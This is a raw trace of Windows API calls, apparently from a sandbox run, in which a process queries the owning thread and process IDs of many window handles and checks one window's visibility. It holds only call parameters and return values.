	[0922.527] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2320
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1fd4
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1880
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b18
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1d6c
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x233c
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2368
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2124
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x22f0
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x22ac
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1cdc
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10f0
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f18
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x20a8
	[0922.528] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2004
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f88
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f84
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2050
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e04
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ecc
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e64
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b58
	[0922.529] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e94
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e28
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1df8
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1da8
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c70
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x163c
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1a10
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x186c
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1d74
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4c8
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1960
	[0922.530] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ce4
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b24
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x14e0
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x17f0
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x854
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1268
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1624
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b9c
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16f4
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x145c
	[0922.531] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x17d0
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1d28
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xcb8
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1190
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x3a8
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1bd0
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1bfc
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1a78
	[0922.532] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b90
	[0922.533] GetWindow (hWnd=0x108b2, uCmd=0x4) returned 0x0
	[0922.534] IsWindowVisible (hWnd=0x108b2) returned 0
	[0922.534] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b04
	[0922.534] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b34
	[0922.534] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b64
	[0922.534] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1bb0
	[0922.534] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1acc
	[0922.534] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1a2c
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x19a8
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1944
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18c8
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18ac
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18ec
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1898
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc98
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x153c
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1808
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x12a4
	[0922.535] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1740
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16c4
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1820
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16ac
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1858
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1664
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10b4
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10ac
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10ec
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1068
	[0922.536] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x17e0
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x102c
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x17a4
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1050
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1694
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1770
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1720
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x165c
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1578
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16c0
	[0922.537] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x161c
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1638
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x15c8
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1554
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1674
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1520
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x14bc
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xf8c
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe9c
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1434
	[0922.538] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x14ec
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xfcc
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x12ac
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1484
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x934
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc0c
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xb08
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x948
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1178
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x13e0
	[0922.539] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xcd0
	[0922.540] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x13fc
	[0922.540] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xdc8
	[0922.540] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc18
	[0922.540] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc2c
	[0922.540] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa1c
	[0923.523] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1244
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xdb0
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1398
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1358
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1370
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1340
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x130c
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x12c0
	[0923.524] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x12e4
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1270
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1298
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x120c
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x122c
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x11c4
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x11b0
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1188
	[0923.525] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1148
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1160
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10fc
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe34
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xea4
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x514
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe48
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xbc8
	[0923.526] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xdf8
	[0923.527] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x318
	[0923.527] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xcac
	[0923.527] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x8bc
	[0923.527] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xf9c
	[0923.527] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xf48
	[0923.527] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe40
	[0923.529] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xecc
	[0923.529] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xeb8
	[0923.529] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe80
	[0923.530] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe98
	[0923.530] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe60
	[0923.530] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xee4
	[0923.530] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xf00
	[0923.530] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xdf0
	[0923.530] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xe1c
	[0923.531] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xdd0
	[0923.531] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xd94
	[0923.531] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xd74
	[0923.532] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xd00
	[0923.532] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xcd8
	[0923.535] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc84
	[0923.535] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xca4
	[0923.535] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc64
	[0923.535] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc24
	[0923.535] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xb84
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xbac
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x384
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xab8
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x33c
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa44
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa64
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x8a8
	[0923.536] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xaf0
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x88c
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xb04
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x910
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x230
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xac0
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xab4
	[0923.537] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xaac
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x3d0
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x978
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa7c
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x59c
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa88
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa6c
	[0923.538] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa68
	[0923.539] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x9f8
	[0923.542] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa04
	[0923.542] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x924
	[0923.542] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x8dc
